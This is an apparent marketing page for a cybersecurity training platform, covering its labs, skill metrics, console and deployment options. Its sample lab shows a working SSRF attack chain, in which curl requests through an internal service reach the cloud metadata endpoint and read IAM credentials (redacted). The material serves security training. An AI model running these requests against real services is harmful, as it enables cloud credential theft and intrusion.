CyberEd · CyCube 2026.Q2 // Capability Platform

Measure what your team can actually do.

CyCube is a capability platform — browser labs, a live-fire range, skill diagnostics, and a researcher network behind one console. Not course completion. Proof.

See a live lab
240+
Live browser labs
9
Skill domains
<90s
Lab reset time
  • Baseline on day 0. Re-measure on day 30.
  • Per-engineer view + per-team view.
  • Exported to PDF or pushed to your BI.
The diagnostic
Hover to replay
Day 00 / 30
WEB / OWASPCLOUDNETWORKCRYPTOIR / FORENSICSHARDWAREMOBILEML / AI
Day-0 baselineDay-30 measurement
The console

What the manager sees.

One pane, every cohort. Every panel rolls up to a number a CISO can take to the board.

  • Skill index
    Score 83 / 100
    Cohort composite. Updates per artifact, not per click.
  • Hours under load
    2,383 hr measured
    Time on actual targets — terminal, not video player.
  • Course status
    65 trainees · live
    Pending / in-progress / completed, per learner.
  • Performance grid
    Per-engineer artifact scores
    What they shipped, against the lab rubric — exportable to BI.
Sample lab — SSRF → cloud metadata

Browser labs. Real targets. No installs.

Each lab is a sandboxed environment with a real intrusion path. This one walks an SSRF in an internal service all the way to a cloud-metadata credential lift.

lab-0042 / ssrf-cloud-metadata · sandbox
uptime 00:04:18
files
  • README.md
  • scope.txt
  • internal-svc/
  • app.py
  • requirements.txt
  • exploits/
  • ssrf.py
  • writeup.md
terminal · /lab
$ curl http://internal-svc/fetch?url=http://example.com
{"ok": true, "body": "<html>..."}

$ curl http://internal-svc/fetch?url=http://169.254.169.254/latest/meta-data/
iam/
hostname
public-ipv4
...

$ curl http://internal-svc/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/lab-role
{
  "AccessKeyId": "AKIA****REDACTED",
  "SecretAccessKey": "****REDACTED",
  "Token": "FwoGZX...",
  "Expiration": "2026-04-25T18:42:11Z"
}

$ aws sts get-caller-identity
network
  • GETinternal-svc:8080200
  • GET169.254.169.254200
  • GETiam/security-credentials/200
  • POSTsts.amazonaws.com200
objective
Lift IAM credentials from the cloud-metadata endpoint via the SSRF in internal-svc.
● runningegress: tenant-only · region us-east-1reset · 89s
Sandbox · Firecracker microVM·Reset in 90s·No data leaves tenant region
The spec sheet

What procurement is going to ask for.

Modules:CyCubeSkillsRangeNetwork
Deployment
SaaS · Self-hosted · Air-gapped
Same product, three install postures.
Authentication
SSO · SAML 2.0 · OIDC · SCIM
Provision and de-provision from your IdP.
Compliance
SOC 2 Type II · ISO 27001
Audit reports under NDA.
Data residency
US · EU · IN
Pin tenant data to a region. Logs follow.
Lab runtime
Firecracker microVMs
Hard isolation. Snapshot + reset in <90s.
Telemetry
Skill events → SIEM/SOAR
Webhook + JSON event stream out of the box.
The pilot

Pilot in 14 days. Baselined skills by day 30.

Pick one module. We provision a tenant, baseline the cohort, run the first drill, and hand back a measured skill delta. Decide on the rest after.